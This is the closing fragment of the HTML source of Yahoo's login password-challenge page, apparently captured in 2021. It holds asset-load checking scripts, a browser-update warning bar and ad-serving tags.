        <img src="/account/js-reporting/?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=%2Faccount%2Fchallenge%2Fpassword" height="0" width="0" style="visibility: hidden;">
    </noscript>
    <script nonce="ozRR9mOWbwa3o1HzjCy2mPrgUCS82PguKiJ8lyyLKRc49jhx">
        var checkAssets = function(seconds) {
            setTimeout(function() {
                if (!window.mbrJSLoaded) {
                    window.mbrSendError('js_failed_to_load', location.pathname);
                }
                var check = document.getElementById('mbr-css-check'),
                    style = check.currentStyle;
                if (window.getComputedStyle) {
                    style = window.getComputedStyle(check);
                }
                if (style.display !== 'none') {
                    window.mbrSendError('css_failed_to_load', location.pathname);
                }
            }, (seconds * 1000));
        };

        checkAssets(10);
    </script>
    <div id="mbr-css-check"></div>
    <div id="page-mask" class="page-mask hide"></div>
    <div id="ad"></div>
    <div class="mbr-legacy-device-bar" id="mbr-legacy-device-bar">
        <label class="cross" for="mbr-legacy-device-bar-cross" aria-label="Close this warning">x</label>
        <input type="checkbox" id="mbr-legacy-device-bar-cross">
        <p class="mbr-legacy-device">
                Yahoo works best with the latest versions of the browsers. You're using an outdated or unsupported browser and some Yahoo features may not work properly. Please update your browser version now. <a href="">More Info</a>
        </p>
    </div>
    <script nonce="ozRR9mOWbwa3o1HzjCy2mPrgUCS82PguKiJ8lyyLKRc49jhx">
        (function(root) {
            if (!root.isGoodJS) {
                document.getElementById('mbr-legacy-device-bar').style.display = 'block';
            }
        }(this));
    </script>
    

<!-- fe30.member.gq1.yahoo.com - Thu Oct 28 2021 20:00:03 GMT+0000 (Coordinated Universal Time) - (0ms) --><script src="https://fc.yahoo.com/sdarla/php/client.php?l=RICH{dest:tgtRICH;asz:flex}&amp;f=794200019&amp;ref=https%3A%2F%2Flogin.yahoo.com%2Faccount%2Fchallenge%2Fpassword&amp;sa=geminifed%253D1%2520y-bucket%253Dmbr-push-untrusted-ar%252Cmbr-fido-1fa-login%252Cmbr-rcscore-threshold%252Cmbr-qr-comet-sdk%252Cmbr-login-domain%252Cmbr-yak-ui-improvement"></script><div id="darla_csc_holder" class="darla" style="display: none;"><iframe style="display: none;" id="darla_csc_writer_0" class="darla" src="https://s.yimg.com/rq/darla/4-10-0/html/r-csc.html" frameborder="no" scrolling="no" allowtransparency="true" hidefocus="true" tabindex="-1" marginwidth="0" marginheight="0"></iframe></div></body></html>